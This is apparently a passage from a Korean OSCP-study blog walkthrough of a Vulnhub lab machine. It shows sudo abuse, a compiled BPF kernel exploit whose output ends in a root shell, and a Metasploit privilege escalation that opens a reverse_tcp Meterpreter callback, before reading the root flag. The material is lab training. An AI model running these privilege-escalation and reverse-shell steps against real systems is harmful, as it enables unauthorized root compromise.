실행되는 듯(SUID)
/tmp/challenge를 bash로 만들어 주자.
saket@ubuntu:~$ cp /bin/bash /tmp/challenge
cp /bin/bash /tmp/challenge
saket@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
끝
다른 방법 :
OS Kernel Exploit을 해보자
Linux ubuntu 4.10.0-28-generic
으로 받아 gcc로 컴파일, 권한 주고 실행하면
www-data@ubuntu:/tmp$ chmod +x root
chmod +x root
www-data@ubuntu:/tmp$ ./root
./root
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff971e392c2300
[*] Leaking sock struct from ffff971e3853ac00
[*] Sock->sk_rcvtimeo at offset 592
[*] Cred structure at ffff971e30d8fb00
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff971e30d8fb00
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
다른 방법 :
┌──(root💀takudaddy)-[/var/www/html]
└─# searchsploit bpf
------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------- ---------------------------------
Linux - BPF Sign Extension Local Privilege Escalation (Metasploit) | linux/local/45058.rb
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀takudaddy)-[/var/www/html]
└─#
┌──(root💀takudaddy)-[/var/www/html]
└─# searchsploit 45010
------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
이걸 쓰면 된단다.
msfconsole에서 세션을 하나 더 오픈하자.
www-data@ubuntu:/home$ ^C
Terminate channel 2? [y/N] y
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search BPF sign
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/bpf_sign_extension_priv_esc 2017-11-12 great Yes Linux BPF Sign Extension Local Privilege Escalation
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/bpf_sign_extension_priv_esc
msf6 exploit(multi/handler) > use exploit/linux/local/bpf_sign_extension_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set LHOST 192.168.20.1
LHOST => 192.168.20.1
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set LPORT 7979 (기본값 4444 써도 됨)
LPORT => 7979
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.20.1:7979
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.t889hP' (207 bytes) ...
[*] Launching exploit ...
[*] Sending stage (980808 bytes) to 192.168.20.2
[*] Meterpreter session 2 opened (192.168.20.1:7979 -> 192.168.20.2:35432) at 2021-03-26 00:13:12 +0900
[*] Cleaning up /tmp/.t889hP and /tmp/.FkaonL2 ...
meterpreter >
meterpreter > sysinfo
Computer : 192.168.20.2
OS : Ubuntu 16.04 (Linux 4.10.0-28-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > shell
Process 5632 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:/home#
root@ubuntu:/home# ls
ls
saket victor
root@ubuntu:/home# cd /root
cd /root
root@ubuntu:~# ls
ls
enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql
root@ubuntu:~# cat root.txt
cat root.txt
b2b17036da1de94cfb024540a8e7075a
끝
728x90
'OSCP > Vulnahub' 카테고리의 다른 글
| 8. Symfonos 2 (0) | 2021.03.28 |
|---|---|
| 7. Symfonos (0) | 2021.03.27 |
| 5. Digitalwolrd.local : bravery (0) | 2021.03.25 |
| 4. Digitalworld.local : Develope (0) | 2021.03.23 |
| 3. Digitalworld.local : Joy (0) | 2021.03.20 |